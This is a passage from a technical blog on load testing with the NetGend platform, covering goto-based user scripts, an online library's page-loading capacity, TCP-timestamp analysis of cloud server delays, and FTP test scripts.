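        wait = re.search(r"please wait (\d+) ms", response)
        if not wait:
            return attempts, response          # registered, leave the loop
        sleep(int(wait.group(1)) / 1000.0)     # back off, then try again

# Fake master: asks the sensor to wait twice, then accepts.
replies = iter(["please wait 200 ms", "please wait 50 ms", "registered"])
slept = []
attempts, final = register(lambda msg: next(replies), slept.append, 7)
print(attempts, final, slept)
# 3 registered [0.2, 0.05]
```

    The "while True" with an early return does the same job as the label and the jump; which one reads better is exactly the question this post is about.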

    Finally as a simple, real world example, we need to emulate a user who visits an e-commerce site,  with the following distribution:
  • 70% probability, the user will just browse the product
  • 20% probability, the user will exit the site.
  • 10% probability, the user will register and continue to browse product
 function VUSER() {
       action(http, "http://www.example.com");  
       isRegistered = 0;  
       browsePercentage = 70;
       exitPercentage = 20;
       registerPercentage = 10;

       setLabel("userAction");  //<--- let the fun start
       if (isRegistered == 0) {  
            choice = rolldice([browsePercentage, exitPercentage, registerPercentage]);  
       } else if (isRegistered == 1) {  
            choice = rolldice([browsePercentage, exitPercentage]);  
       }  
       if (choice == 0) { //browse product
            //pick a product and view it  
       } else if (choice == 1) { //exit site  
            return 1;  
       } else { //register  
            //register actions
            isRegistered = 1;  
            browsePercentage += registerPercentage;  
        }  
       goto("userAction");  
}
    The rolldice() function above will pick a choice (it's 0 based) according to the percentages. Based on the value of choice, we perform one of the 3 actions and go back to "userAction" to decide what to do next.
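
    The way a weighted pick like this typically works can be sketched in a few lines of Python. This is a guess at the general technique, not the actual implementation of rolldice(); the function name roll_dice and the seeded generator are my own choices for the example.

```python
import random

def roll_dice(percentages, rng=random):
    """Return a 0-based index, chosen with probability proportional to its weight."""
    total = sum(percentages)
    point = rng.uniform(0, total)      # a random position on the 0..total line
    cumulative = 0
    for i, weight in enumerate(percentages):
        cumulative += weight
        if point < cumulative:         # the position falls inside this slice
            return i
    return len(percentages) - 1        # guard against rounding at the upper edge

# Rough check of the 70/20/10 split with a seeded generator.
rng = random.Random(42)
counts = [0, 0, 0]
for _ in range(10000):
    counts[roll_dice([70, 20, 10], rng)] += 1
print(counts)   # roughly 7000 / 2000 / 1000
```

    Because the weights are divided by their sum, the two-element call used after registration behaves as expected without any extra normalization.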

    The human mind is wired to understand "goto" faster.  Let's keep it that way for performance testing.

Friday, December 6, 2013

Performance testing on an online library



     Recently we tested an online library. This library serves many technical documents, each in the form of a book.  Users can search and read the books from their browsers.    We needed to find the capacity of this library, defined as the number of users that can use the library concurrently and still have a positive experience.

   The development team had gone out of their way to make the user experience as pleasant as possible.  For example, when a user flips a page, it loads immediately.  Why?  The system pre-loads the next page while the user is reading the current page.  Assuming a user spends an average of 20 seconds reading a page, we want to find out how many users the library can serve while most page loading times are still within 20 seconds.

   In summary, here is a simple test scenario:
  • the user logs in to the library
  • pick a book
  • go to a random page in the book and read all the way to the last page. 
     The login step is relatively simple and so is the step of getting a list of books.  The hard part is emulating a user flipping through the pages.  The web page representing a book contains a Flash application.  According to the developer tool, when the user flips to the next page, the Flash application sends an HTTP request like the following:
 .../<bookId>/<prefix><pageNumber>.swf  

    It's easy to find the list of book IDs.  However, it's not as easy to find the following:

  • "prefix" (it varies with the bookId)
  • max pages of the book - used to generate a random page in the book
    Luckily, the following blob of text in the HTML page of the book has the information we need.
 function(){setPreviewSource('/123456789/410/{ef[*,0].swf,96}&DownloadEnabled=false&PrintEnabled=false&PrintOnePageEnabled=false','/bitstream/123456789/410/3/ef.js','/bitstream/123456789/410/2/6515695376  

     With this observation, we can easily write a script to extract those fields:
  • URL path ("/123456789/410/" in the sample above)
  • prefix ("ef")
  • max number of pages ("96").
     We are going to use the regular expression /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/ to do the extraction.
 //script A
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = "jsmith@example.com";   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      for (id = 1; id < 500; id ++) {  
           action(http, "http://www.example.com/handle/123456789/${id}");  
           if (match(http.replyBody, /setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)/)) {  
                println("${g1},${g2},${g3}");  
           }  
      }  
      action(http,"http://www.example.com/logout");   
 }  
     Note that the three variables g1, g2 and g3 hold the three fields extracted by the regular expression. We ran the script with 1 VUser and collected the output of "println" to produce a csv file (say, "books.csv"), which we will use in the next step.  The csv file looks like:
 ...  
 /123456789/410,ef,96  
 ....  
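
     To sanity-check the regular expression outside the platform, the same pattern can be run in Python against the sample blob from the book page. This is only a sketch: the function name extract_book_fields is made up for illustration, and the sample text is truncated exactly as in the post. Note that the first group, as captured by this pattern, keeps its trailing slash.

```python
import re

# Same pattern as in script A, written as a Python raw string.
PREVIEW_RE = re.compile(r"setPreviewSource\(\'([^\{]+)\{([^\[]+).*swf\,(\d+)")

# Sample blob copied from the book page (truncated as in the post).
SAMPLE = (
    "function(){setPreviewSource('/123456789/410/{ef[*,0].swf,96}"
    "&DownloadEnabled=false&PrintEnabled=false&PrintOnePageEnabled=false',"
    "'/bitstream/123456789/410/3/ef.js','/bitstream/123456789/410/2/6515695376"
)


def extract_book_fields(html):
    """Return (url_path, prefix, max_pages), or None if the page has no match.

    Hypothetical helper name, used only for this illustration.
    """
    m = PREVIEW_RE.search(html)
    if m is None:
        return None
    return m.group(1), m.group(2), int(m.group(3))


fields = extract_book_fields(SAMPLE)
print(fields)
```

     Returning None for pages without a match mirrors the "if (match(...))" guard in script A, so book IDs that have no preview are simply skipped.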

    On a side note, this shows that our platform is not limited to performance testing. It can potentially be used to build handy tools too :-)

    Now we are going to use the csv file in the implementation of the test scenario:

  //script B
 function userInit() {  
      var db = fromCSV("books.csv");  
 }  
 function VUSER() {  
      action(http,"http://www.example.com/"); //this step will get a sessionID in cookie   
      a.login_email = toUrl("jsmith@example.com");   
      a.login_password = "abc123";   
      http.POSTData = combineHttpParam(a);   
      action(http,"http://www.example.com/password-login");   

      a = getNext(db);  

      for(num = randNumber(1, a[2]); num <= a[2]; num ++ ) {
           action(http,"http://www.example.com/handle/${a[0]}${a[1]}${num}.swf");  
           if (http.totalRespTime > 20000) {  
                println("${http.totalRespTime},${http.url}");  
           }
      }
 }  
     Here the function call getNext(db) grabs the next row in the csv file.  Each row consists of 3 elements, URL_path, prefix and max_pages, denoted by a[0], a[1] and a[2] respectively.   So randNumber(1, a[2]) simply picks a random page in this book, and the loop reads from that page to the last one.
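
     The page-flipping loop can be pictured with a small Python sketch that turns one csv row into the sequence of page requests. The helper name page_paths and its "start" parameter are assumptions made for this illustration, and the random start page is assumed to be inclusive on both ends, which the post does not state for randNumber.

```python
import random


def page_paths(url_path, prefix, max_pages, start=None, rng=random):
    """Yield the .swf path of every page from a start page to the last page.

    Hypothetical helper: when `start` is None a random start page is drawn,
    assuming both 1 and max_pages are valid choices.
    """
    if start is None:
        start = rng.randint(1, max_pages)  # randint is inclusive on both ends
    base = url_path.rstrip("/")  # tolerate rows with or without a trailing slash
    for page in range(start, max_pages + 1):
        yield f"{base}/{prefix}{page}.swf"


# One row as it appears in books.csv: URL_path, prefix, max_pages.
row = ("/123456789/410", "ef", "96")
paths = list(page_paths(row[0], row[1], int(row[2]), start=94))
print(paths)

# Without an explicit start, the walk still always ends on the last page.
random_walk = list(page_paths(row[0], row[1], int(row[2])))
```

     Passing "start" explicitly makes a run repeatable, which can be handy when comparing response times between test runs.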
     We ran script B multiple times, each time with a different number of VUsers, and found the largest number of VUsers at which the response times were still acceptable.  The development team was quite happy with how simple the scripts are. They had tried JMeter, which was not as flexible.
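
     One way to turn those runs into a capacity number is sketched below in Python. Everything here is an assumption for illustration: the response times are made-up values (not measurements from this test), "most page loads" is interpreted as at least 95% of them, and the function names are hypothetical.

```python
def fraction_within(times_ms, limit_ms=20000):
    """Fraction of page loads that finished within the limit."""
    return sum(1 for t in times_ms if t <= limit_ms) / len(times_ms)


def capacity(runs, limit_ms=20000, min_fraction=0.95):
    """Largest VUser count that passes before the first failing run.

    `runs` maps a VUser count to the response times (ms) seen in that run.
    Runs are checked in ascending order and the search stops at the first
    run that misses the target, so a lucky pass at a higher load is ignored.
    """
    best = None
    for vusers in sorted(runs):
        times = runs[vusers]
        if not times or fraction_within(times, limit_ms) < min_fraction:
            break
        best = vusers
    return best


# Made-up response times in milliseconds, for illustration only.
runs = {
    100: [800, 1200, 950, 1100],
    200: [3000, 5200, 4100, 19000],
    400: [9000, 26000, 31000, 18000],
}
print(capacity(runs))
```

     The 20000 ms limit matches the 20 seconds a user is assumed to spend reading a page; the 95% threshold is just one reasonable reading of "most".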

    Development of an online library can be challenging, but performance testing on the library doesn't have to be. What do you think?

Tuesday, December 3, 2013

Use caution when migrating to the cloud

     Cloud platforms have become increasingly popular thanks to their better sharing of hardware resources.  More and more services are being migrated to them.  However, along with the benefits come some performance concerns, which we are going to look at in this blog.

    Recently I did a performance test against an online library.  We needed to log in to the site, pick a book and emulate a user browsing through the pages of the book.

    It's fairly easy to develop the script on the NetGend platform (URLs and names are obscured to keep the site anonymous):
 function VUSER() {  
      action(http,"http://www.example.com"); //this step will get a sessionID in cookie  
      a.login_email = toUrl("jsmith@example.com");  
      a.login_password = "abc123";  
      http.POSTData = combineHttpParam(a);  
      action(http,"http://www.example.com/password-login");  

      for (id = 1; id < 340; id ++) {  
           action(http,"http://www.example.com/1234567/19/11h${id}.swf");  
           println("${id},${http.totalRespTime},${http.url}");  
      }  
 }  

    To my surprise, the response times (defined as the time between the transmission of the HTTP request and the last packet of the HTTP response) varied from 234ms to 1911ms.  Since the HTTP response sizes for these transactions were about the same, I wondered what caused the variation in response times.

    Luckily I have a friend called "Wireshark", the world's most famous packet sniffer.  According to the packet capture shown in Wireshark, there is a range of packets with long delays between them.  There are no dropped packets (hence no packet re-transmissions) here, so there are two possibilities left:
  • Delay was caused by the server.
  • Delay was caused by the network elements (like routers) along the path between the server and my PC.
    At this point, it appears impossible to determine which one is the real cause.  Thanks to the TCP timestamp option (which is turned on by default on many systems), it's possible to determine where the delay happened.   Why? Because the timestamp value (TSval) in the TCP timestamp option, carried in the options part at the end of the TCP header, is set by the server when a TCP packet is sent. By looking at how the TCP timestamp varies, we can infer whether the delay is caused by the server or the network.

    Here is what I gathered from the wireshark packet capture:

 1 0.000000000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 2 0.000375000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 3 0.000500000 192.168.5.105 38922 1.1.1.1 80 TSval 66747395  
 4 0.000675000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383927  
 5 0.035894000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383936  
 6 0.035929000 192.168.5.105 38922 1.1.1.1 80 TSval 66747404  
 7 0.188478000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 8 0.188825000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 9 0.188856000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 10 0.189142000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 11 0.189454000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  
 12 0.189479000 192.168.5.105 38922 1.1.1.1 80 TSval 66747443  
 13 0.189764000 1.1.1.1 80 192.168.5.105 38922 TSval 1483383974  

    The second column is the sniffer timestamp (when the packet was captured by the sniffer) and the last column is the TCP timestamp.  One challenge here is to find out how much time one unit of TCP timestamp corresponds to.

    Let's take a look at 3 packets from the server whose TCP timestamp changed (packets 4, 5 and 7):

  • between packets 4 and 5, the TCP timestamp advances by 9 (from 1483383927 to 1483383936) and the sniffer timestamp advances by about 36ms (more precisely 35.2ms). One unit of TCP timestamp is roughly 4ms.
  • between packets 5 and 7, the TCP timestamp advances by 38 (from 1483383936 to 1483383974) and the sniffer timestamp advances by about 153ms. Again, one unit of TCP timestamp is roughly 4ms.
    So based on packets 4, 5 and 7, we can conclude that the TCP timestamp changes match those of the sniffer timestamp for these packets. This indicates that the network didn't delay the packets: the gaps were already there when the server stamped and sent them, so the big delays between the packets were caused by the server.
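
    The arithmetic can be double-checked with a few lines of Python, using only the three server packets from the capture. The helper name ms_per_tick is made up for this sketch. If the network had held packets back, the sniffer gap would grow while the TCP timestamp gap stayed small, and the ratio would jump instead of staying near 4ms.

```python
# (packet number, sniffer time in seconds, server TSval) taken from the capture.
server_packets = [
    (4, 0.000675000, 1483383927),
    (5, 0.035894000, 1483383936),
    (7, 0.188478000, 1483383974),
]


def ms_per_tick(earlier, later):
    """Sniffer time elapsed (ms) per unit of TCP timestamp between two packets."""
    _, t0, ts0 = earlier
    _, t1, ts1 = later
    return (t1 - t0) * 1000.0 / (ts1 - ts0)


pairs = list(zip(server_packets, server_packets[1:]))
estimates = [ms_per_tick(a, b) for a, b in pairs]

for (a, b), est in zip(pairs, estimates):
    print(f"packets {a[0]} -> {b[0]}: {est:.2f} ms per tick")
```

    Both pairs give close to 4ms per unit, which would be consistent with a 250 Hz timestamp clock on the server, although the capture itself does not tell us the clock rate.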

    Later on, it was confirmed that the server was running on a cloud based platform, possibly sharing hardware with some noisy/busy neighbors.  While 153ms of unexpected delay may not seem like much, it can accumulate, and not all applications can tolerate it.    Now you know that sharing hardware can be a double-edged sword. You have been warned on your road to the cloud :-)
   

Monday, December 2, 2013

Performance testing on ftp servers


    FTP servers were very popular in the 90's. They are still in use today, mainly to serve large content, especially software packages.   Browsers support FTP by default, so you may not even notice when you trigger an FTP transaction by clicking a link.   In this blog, we will cover performance testing on FTP servers.

    The NetGend platform supports all the FTP transactions: ls, get, put and so on.

    First, let's look at an example of uploading a file to a server.   Suppose we need to upload a local file "users.csv" to a remote file "tmp.txt" in the directory "www/test".   Here is the simple script:
 function VUSER() {  
      connect("ftp.example.com", 21);  
      action(ftp, login, "jsmith", "abc123");  
      action(ftp, op, "cd", "www/test");   
      action(ftp, op, "pwd");  
      ftp.data = readFile("users.csv");  
      action(ftp, op, "put", "tmp.txt");  
 }  
     Pretty obvious, isn't it?   Note that in the above script, the variable "ftp.data" holds the data to be sent to ftp server.  You can dynamically generate the data if you want.

    The operations "ls" and "get" are even simpler:
 action(ftp, op, "ls");   
 //ftp.recvedData will hold the output of "ls".  

 action(ftp, op, "get", "tmp.txt");   
 //ftp.recvedData will hold the content of remote file "tmp.txt"  
    What's interesting here is that after the operation, the variable "ftp.recvedData" holds the output of the operation. In the case of the "ls" operation, it's the directory listing. In the case of the "get" operation, it's the content of the downloaded file.  You can do all the usual operations on this variable, such as using a regexp to grab certain fields and using them in the next ftp operations.
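
    As an illustration of grabbing fields from a directory listing, here is a Python sketch that pulls file names and sizes out of "ls" output. The listing below is a hypothetical Unix-style sample, not output from a real server, and real FTP servers may format their listings differently, so the regular expression is an assumption that would need adjusting.

```python
import re

# Hypothetical Unix-style listing; real servers may format "ls" output differently.
SAMPLE_LISTING = """\
-rw-r--r--   1 jsmith   users        2048 Dec 02 10:15 tmp.txt
-rw-r--r--   1 jsmith   users      104857 Dec 01 09:00 users.csv
drwxr-xr-x   2 jsmith   users        4096 Nov 30 18:42 archive
"""

# type/permissions, link count, owner, group, size, month, day, time, name
LINE_RE = re.compile(
    r"^(?P<type>[-d])\S*\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)"
    r"\s+\w+\s+\d+\s+[\d:]+\s+(?P<name>.+)$"
)


def regular_files(listing):
    """Return (name, size) for each regular file, skipping directories."""
    files = []
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("type") == "-":
            files.append((m.group("name"), int(m.group("size"))))
    return files


files = regular_files(SAMPLE_LISTING)
print(files)
```

    Each extracted name could then be fed to a following "get" operation, so a virtual user downloads whatever files the server currently lists.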

    Of course, the following operations are also supported.  They are fairly straightforward:
action(ftp, op, "del", "temp.txt"); 

action(ftp, op, "bye"); 

action(ftp, op, "pwd"); 

     FTP lost to HTTP because FTP is simpler than HTTP: it doesn't have the fancy extensions of HTTP.   So let's keep performance testing on FTP simple too.